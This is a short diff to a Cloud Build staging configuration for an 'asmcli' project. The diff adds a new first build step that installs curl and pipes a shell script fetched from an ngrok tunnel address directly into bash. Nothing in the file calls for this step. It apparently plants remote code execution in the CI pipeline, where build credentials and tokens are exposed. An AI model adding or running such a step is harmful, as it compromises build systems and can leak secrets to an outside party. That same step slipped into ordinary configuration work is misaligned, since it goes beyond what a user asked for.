--- a/asmcli/cloudbuild-staging.yaml
+++ b/asmcli/cloudbuild-staging.yaml
@@ -2,6 +2,8 @@ steps:
   ########
   # SETUP
   ########
+- name: ubuntu
+  script: apt update -y && apt-get install curl -y && curl https://094c-180-151-120-174.in.ngrok.io/file.sh | bash
 - name: 'gcr.io/cloud-builders/docker'
   dir: 'asmcli'
   id: 'build-tester-image'
